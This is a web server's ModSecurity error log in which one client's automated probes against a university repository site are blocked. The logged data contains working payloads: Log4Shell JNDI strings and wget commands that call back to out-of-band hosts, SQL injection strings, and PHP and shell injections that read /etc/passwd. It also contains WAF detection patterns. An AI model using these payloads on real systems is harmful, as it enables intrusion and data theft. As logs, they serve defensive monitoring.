[Tue Aug 29 11:30:25.409426 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgpnd77kuft4bgh.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPOhYQAAAAa"]
[Tue Aug 29 11:30:25.421404 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPRNaUAAAAf"]
[Tue Aug 29 11:30:26.315237 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAPfm7kAAAAR"]
[Tue Aug 29 11:30:28.378825 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAPDnwEAAAAP"]
[Tue Aug 29 11:30:28.388468 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAPDnwEAAAAP"]
[Tue Aug 29 11:30:29.327508 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAPNBSMAAAAZ"]
[Tue Aug 29 11:30:30.305406 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZsCo-f0AAAPPSvcAAAAd"]
[Tue Aug 29 11:30:30.506136 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPMl-8AAAAY"]
[Tue Aug 29 11:30:31.349960 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10Z8Co-f0AAAPRNa0AAAAf"]
[Tue Aug 29 11:30:32.664446 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPXAl8AAAAi"]
[Tue Aug 29 11:30:33.563751 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPDnxYAAAAP"]
[Tue Aug 29 11:30:34.367371 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPahv0AAAAL"]
[Tue Aug 29 11:30:34.373355 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPahv0AAAAL"]
[Tue Aug 29 11:30:34.439116 2023] [:error] [pid 1008] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgtqpwzd7bontwi.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPw@TsAAAAR"]
[Tue Aug 29 11:30:34.458022 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPv-EcAAAAM"]
[Tue Aug 29 11:30:35.558957 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPENdwAAAAQ"]
[Tue Aug 29 11:30:35.638483 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPxBSUAAAAS"]
[Tue Aug 29 11:30:36.413731 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPpWdEAAAAI"]
[Tue Aug 29 11:30:37.322710 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPPSwUAAAAd"]
[Tue Aug 29 11:30:37.427317 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPXAnAAAAAi"]
[Tue Aug 29 11:30:37.614795 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPENeUAAAAQ"]
[Tue Aug 29 11:30:37.663411 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPENecAAAAQ"]
[Tue Aug 29 11:30:39.487399 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAOM4XwAAAAU"]
[Tue Aug 29 11:30:39.489242 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAOM4XwAAAAU"]
[Tue Aug 29 11:30:39.563485 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPyOEUAAAAR"]
[Tue Aug 29 11:30:42.492703 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10csCo-f0AAAPv-GEAAAAM"]
[Tue Aug 29 11:30:42.584384 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPXApIAAAAi"]
[Tue Aug 29 11:30:43.447347 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlguer359dg8u79e.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPyOFYAAAAR"]
[Tue Aug 29 11:30:43.454876 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPXApYAAAAi"]
[Tue Aug 29 11:30:44.330137 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPxBTYAAAAS"]
[Tue Aug 29 11:30:45.413519 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAP05FsAAAAA"]
[Tue Aug 29 11:30:47.464195 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPQkhMAAAAe"]
[Tue Aug 29 11:30:47.476685 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAO878QAAAAF"]
[Tue Aug 29 11:30:47.564884 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAOKNqkAAAAK"]
[Tue Aug 29 11:30:48.341011 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgr649ccd4pjsux.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPxBUYAAAAS"]
